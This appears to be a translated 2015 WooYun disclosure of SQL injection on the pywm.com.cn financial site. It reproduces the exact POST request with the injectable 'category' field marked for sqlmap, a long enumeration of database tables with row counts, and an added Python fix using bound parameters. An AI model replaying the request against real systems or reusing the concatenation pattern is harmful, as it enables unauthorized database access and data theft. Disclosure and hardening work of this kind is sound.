Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144987

Title: SQL injection on the 泛华普益 main site (millions of records exposed)

Vendor: pywm.com.cn

Author: 路人甲

Submitted: 2015-10-06 14:12

Fix time: 2015-10-13 09:00

Disclosed: 2015-10-13 09:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-10-06: Details sent to the vendor, awaiting vendor handling
2015-10-13: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

See title.

Detailed description:

POST /issue_product---page--19.html HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.pywm.com.cn/success_case---index.html
Cookie: PHPSESSID=b8404140288f2bbfadd81c4d01ad6a56
Host: www.pywm.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%c9%b8%d1%a1&category=1*&duration=&issue_way=&sale_state=&start_point=s


The category parameter is injectable.

[image: 注入点.png (injection point)]


Proof of vulnerability:

42 databases are involved.

[image: dbs.png (database list)]


A large amount of data is involved:

Database: product
+-------------------------------------+---------+
| Table                               | Entries |
+-------------------------------------+---------+
| capital_flow | 56929574 |
| bank_product_area_back_07_0805 | 14265693 |
| fund_risk | 8485555 |
| stock_top_ten_change | 6334212 |
| stock_global_index | 4045602 |
| bank_product_area | 3353826 |
| fund_open_ended_value | 1965992 |
| bank_product_area_back | 1435551 |
| trust_securities_value_index | 911050 |
| front_mydata | 891716 |
| stock_cnbene_transaction | 602681 |
| macroeconomics_data | 445100 |
| stock_flow_ten_change | 432334 |
| stock_reform_info | 398185 |
| fund_equity_portfolio | 359077 |
| stock_last_newintro | 357254 |
| bank_product_comment | 327129 |
| tmp_bank_product_comment_tmp_kcx | 327129 |
| bank_products_info | 323873 |
| tmp_base_bank_data_tmp | 323869 |
| fund_money_market_value | 322686 |
| fund_open_ended_value_2 | 317430 |
| product_base_bank_data_lc | 314891 |
| stock_information_content | 312056 |
| fund_stock_holding | 295321 |
| send_message_record | 229484 |
| trust_securities_value | 228868 |
| stock_shareholders | 220929 |
| stock_cnbene_trend | 192567 |
| insurance_sellprice | 176121 |
| fund_close_ended_value | 165263 |
| stock_cahng7_ranking | 163599 |
| insurance_buyprice | 160365 |
| stock_business_analysis | 153118 |
| stock_risk_factors | 143667 |
| fund_bond_holding | 136440 |
| stock_cnbene_invest_stat | 127115 |
| bank_grade_info | 110596 |
| bank_sub_branch_intro | 107982 |
| stock_secondary_market | 92226 |
| bank_error_record | 90043 |
| bondnet | 86861 |
| stock_top_ten_voting | 83709 |
| security_net | 78967 |
| stock_main_operation | 72883 |
| stock_related_corperate | 67898 |
| stock_executive_info | 64093 |
| bank_grade_info_copy2 | 60779 |
| bank_sub_branch_intro_copy1 | 59357 |
| bank_sub_branch_intro_copy2 | 59357 |
| bank_sub_branch_intro_copy | 59355 |
| stock_fund_hold | 55569 |
| tmp_bank_product_price_kcx | 48749 |
| stock_related | 48360 |
| trust_product_level | 46526 |
| stock_dividend | 45026 |
| stock_conside_info | 41629 |
| bank_structured_product | 40151 |
| tmp_bank_structured_product_tmp_kcx | 40151 |
| fund_scale | 39707 |
| stock_cnbene_micro | 39692 |
| trust_product_info | 38397 |
| fund_assets_allocation | 38278 |
| bank_grade_info_copy | 36343 |
| trust_income | 34802 |
| bank_products_info_bak1030 | 30805 |
| stock_development | 30801 |
| stock_financial_indicators | 30473 |
| stock_change_info | 29363 |
| fund_bond_portfolio | 28951 |
| stock_equity | 27631 |
| stock_cnbene_rating | 27459 |
| stock_executives_part_time | 26400 |
| bond_rate | 25629 |
| stock_profit_profitability | 25020 |
| stock_per_index | 25005 |
| stock_cash_flow | 24921 |
| stock_operate_development | 24921 |
| stock_org_sharehold | 21848 |
| stock_industry_analysis | 20772 |
| macro_index_calendar | 19677 |
| stock_dividend_baseinfo | 17419 |
| stock_financial_return | 17401 |
| stock_financial_transaction | 15669 |
| fund_fixed_investment | 15628 |
| statistics_trust_detail | 15611 |
| insurance_uni_clearrate | 14599 |
| bank_products_info_useforei | 12957 |
| stock_cnbene_bruntinfo | 12660 |
| fund_front_expense | 11062 |
| bank_products_bak_info | 10752 |
| fund_product_ranking | 10466 |
| stock_business_info | 10299 |
| stock_cnbene_finace | 9536 |
| bank_redemption_fee | 7995 |
| common_index | 7378 |
| trust_company_rank | 6643 |
| common_index_rate | 5984 |
| bank_rank | 5877 |
| trust_institute_info | 5867 |
| fund_back_expense | 5513 |
| trust_income_new | 5342 |
| tmp_trust | 5223 |
| trust_purchasing_note | 4988 |
| fund_management_duration | 4961 |
| bond_transaction | 4665 |
| trust_product_duration | 4377 |
| fund_dividend | 4002 |
| trust_director_info | 3847 |
| macro_event_notice | 3393 |
| city | 3290 |
| city_bak | 3286 |
| tmp_denglei_test_tmp | 3272 |
| fund_benchmark | 3051 |
| credit_product_info | 2913 |
| bond_products_info | 2883 |
| stock_company_info | 2495 |
| stock_code_industry | 2471 |
| bank_capital_user | 2459 |
| stock_information | 2446 |
| stock_area_type | 2350 |
| fund_description | 2298 |
| fund_product_info | 2294 |
| bank_bond_ratepay | 2287 |
| stock_rights_issues | 2162 |
| trust_product_star | 2118 |
| macroeconomics_guideline_bak | 2102 |
| macroeconomics_guideline_bak1030 | 2101 |
| trust_yield_allocation | 2100 |
| insurance_info | 2042 |
| trust_liquidation_total | 2036 |
| stock_additional_info | 2034 |
| insurance_info_bak20111221 | 2014 |
| report_all_info | 1926 |
| flt_message | 1915 |
| front_group_stock | 1840 |
| bank_excel_log | 1762 |
| bank_branch_intro | 1744 |
| common_index2 | 1720 |
| insurance_product_info | 1662 |
| fund_manager | 1652 |
| bank_grade_info_copy1 | 1608 |
| setup_message_temp | 1599 |
| credit_bankrate_info | 1572 |
| trust_add_project | 1567 |
| credit_bankrate_info_wy | 1558 |
| fund_management_duration_copy | 1535 |
| trust_securities_info | 1522 |
| bank_error_record2 | 1372 |
| fund_external_type | 1360 |
| front_stocksearchcount | 1348 |
| insurance_payment | 1223 |
| yi_tmp | 1145 |
| bank_purchase_fee | 1112 |
| trust_executive_info | 1105 |
| trust_shareholder_info | 1062 |
| fund_rank_info | 1047 |
| fund_company_ranking | 1012 |
| pyfund_fund_risk_level | 931 |
| flt_answer | 922 |
| trust_self_long_equity | 879 |
| insurance_link | 748 |
| insurance_attach | 737 |
| address_list_info | 726 |
| institute | 709 |
| front_answer | 688 |
| fund | 665 |
| front_questions | 659 |
| sz_index | 530 |
| trust_manager_info | 494 |
| macroeconomics_guideline | 479 |
| bank_head_office_intro | 450 |
| tmp_report_lccp_alluse_tmp | 429 |
| trust_return_rate | 426 |
| insurance_fee_new | 418 |
| banknet_value_error | 408 |
| trust_fee_info | 399 |
| bank_risk | 395 |
| trust_investment_consultant | 382 |
| trust_capital_field | 376 |
| trust_self_capital_field | 370 |
| trust_staff_age | 370 |
| trust_staff_eduation | 370 |
| trust_balance_sheet_right | 369 |
| trust_regist_capital | 369 |
| trust_balance_sheet_liabilities | 368 |
| trust_capital_manner | 368 |
| trust_profit_sheet | 368 |
| trust_self_capital_risk | 368 |
| trust_company_income | 367 |
| trust_self_assets_rate | 365 |
| trust_self_capital_invest | 365 |
| trust_balance_sheet_assets | 362 |
| trust_post_info | 347 |
| trust_self_asset_profit | 344 |
| bank_fund_like_product | 315 |
| security_product_info | 313 |
| trust_self_blance_right | 312 |
| fund_value_split | 311 |
| bank_fx_deposit_rate | 306 |
| macroeconomics_repurchase_rate | 288 |
| macroeconomics_bank_bill | 253 |
| statistics_trust_rank_result | 245 |
| credit_class_org | 243 |
| security_manager | 233 |
| macro_holiday | 232 |
| bank_excel_log_copy | 231 |
| bank_bond_info | 225 |
| bank_head_office_intro_copy0414 | 214 |
| trust_history_event | 205 |
| insurance_account | 204 |
| trust_product_comment | 178 |
| trust_asset_final_stock | 168 |
| company_external | 166 |
| product_chinabank_usefor_libo | 153 |
| front_answer_del | 150 |
| trust_error_record | 145 |
| tmp_bank_huilv_tmp_wjy | 144 |
| card_telephone_clean | 122 |
| front_questions_stock | 121 |
| fund_portfolio_product | 116 |
| insurance_companies | 108 |
| sdb_recommend_form | 108 |
| front_questions_del | 104 |
| fund_company_shareholding | 95 |
| bank_bond_product | 91 |
| issue_product | 86 |
| fund_company | 81 |
| address_admin | 80 |
| bank_subscription_fee | 74 |
| recommend_level_form | 72 |
| trust_company_info | 70 |
| report_area_info | 63 |
| pyfund_company_risk_level | 58 |
| cninsurance | 53 |
| fund_portfolio | 50 |
| stock_industry | 50 |
| front_knowledgebase | 42 |
| product_sell_info | 41 |
| report_info | 38 |
| fund_others_consignment | 35 |
| user_product_order | 35 |
| macro_rate_data | 33 |
| legal_summary | 32 |
| bank_deposit_rate | 31 |
| issue_product_error | 31 |
| fund_sub_company | 30 |
| macro_rate | 30 |
| cnbene_event | 25 |
| tmp_bank_report | 16 |
| report | 14 |
| trust_company_history | 13 |
| statistics_trust_rank_parameter | 12 |
| trust_transfer | 12 |
| fund_foreign_trustee | 10 |
| fund_search_item | 9 |
| flt_staff | 7 |
| security_attachment | 7 |
| indexpic_info | 5 |
| insurance_universal_premium | 5 |
| bank_manager_info | 4 |
| front_questionstype | 4 |
| secutity_dividend | 4 |
| tmp_bank_quanzhong | 4 |
| tmp_bank_report_jiqi | 4 |
| trust_major_shareholder | 4 |
| bank_report_data | 3 |
| bond_name | 3 |
| front_group | 3 |
| insurance_benefit | 3 |
| insurance_uni_lined_quit | 3 |
| insurance_uni_recevied | 3 |
| bank_transfer | 2 |
| front_accesscontrol_stock | 2 |
| insurance_fee | 2 |
| tmp_trust_week | 2 |
| trust_company_accounting | 2 |
| bank_fund_product | 1 |
| bank_product_commment_testlibo | 1 |
| client_menu | 1 |
| fund_account_alteration | 1 |
| insurance_added_premium | 1 |
| insurance_linked_basefee | 1 |
+-------------------------------------+---------+


I did not go any deeper than this.

Fix recommendation:

Filtering.
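The request above shows the `category` form field reaching the database query unchanged, and the suggested fix is input filtering. The following is an added example (not code from the report or from pywm.com.cn) that contrasts the string-concatenation pattern the injection implies with a hardened handler that validates the field's type and binds it as a parameter. The `issue_product` table name comes from the report; its columns, the sample rows and the function names are constructed assumptions.

```python
import re
import sqlite3

# Constructed sample schema and rows standing in for the site's `issue_product`
# table; the real columns are not known from the report.
SAMPLE_ROWS = [
    (1, "Product A", 1),
    (2, "Product B", 1),
    (3, "Product C", 2),
]

def make_db():
    """Build an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE issue_product (id INTEGER, name TEXT, category INTEGER)"
    )
    conn.executemany("INSERT INTO issue_product VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn

def unsafe_query(category):
    """The pattern the report implies: the raw form field is pasted into the
    statement, so whatever the client sends becomes SQL. Shown for contrast
    only; it is never executed here."""
    return "SELECT name FROM issue_product WHERE category = " + category

def list_products(conn, category):
    """Hardened handler: validate the field against its expected type (an
    integer category id), then pass it as a bound parameter so the database
    never parses client-supplied bytes as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", category):
        raise ValueError("category must be a positive integer id")
    cur = conn.execute(
        "SELECT name FROM issue_product WHERE category = ? ORDER BY id",
        (int(category),),
    )
    return [row[0] for row in cur]

if __name__ == "__main__":
    db = make_db()
    print(list_products(db, "1"))
    print(unsafe_query("1*"))  # the sqlmap marker survives verbatim in the SQL
```

Even with binding in place, the remaining form fields (duration, issue_way, sale_state, start_point) need the same treatment, since each of them reaches the same query.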

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-10-13 09:00

Vendor reply:

Vulnerability rank: 4 (WooYun rating)

Latest status:

None

